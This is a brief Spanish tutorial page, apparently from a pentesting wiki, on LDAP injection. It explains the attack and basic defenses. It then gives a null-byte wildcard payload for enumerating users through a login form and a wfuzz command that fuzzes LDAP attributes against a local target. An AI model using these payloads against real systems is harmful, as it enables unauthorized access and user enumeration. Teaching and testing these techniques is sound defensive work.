Inyecciones LDAP

#OWASP10 #LDAP

Las inyecciones LDAP son ataques que explotan vulnerabilidades en aplicaciones web conectadas a servidores LDAP, usados para guardar datos de usuarios y recursos en redes.

Se insertan comandos maliciosos en campos de entrada web, enviados al servidor LDAP. Si la aplicación no maneja bien la entrada, un atacante puede acceder a información no autorizada, modificar la base de datos o realizar acciones maliciosas en la red. Para prevenirlo, las aplicaciones deben validar y limpiar la entrada del usuario, ejecutarse con mínimos privilegios y monitorear el servidor LDAP.

Ataque

Imagina que tienes un target que de seguro utiliza LDAP y su estructura de login es la siguiente:

user_id=admin&password=admin&login=1&submit=Submit

Para enumerar usuarios, necesitas hacer una query tipo (&(cn=admin))%00(userPassword=*)) => (&(cn=admin)) con null bytes para acortar, entonces puedes hacer lo siguiente:

user_id=a\*))%00&password=asdasdasd&login=1&submit=Submit

Fuzzing

Las inyecciones LDAP tambien son vulnerables a fuzzing, esto se puede lograr como por ejemplo:

wfuzz -c --hc=439 -w /usr/share/seclists/fuzzing/LDAP-openldap-atributes.txt -d 'user_id=*)(FUZZ=*))%00&password=*&login=1&submit=Submit' http://localhost:8888

PreviousClient-Side Template Injection (CSTI)NextXXE

Last updated 1 year ago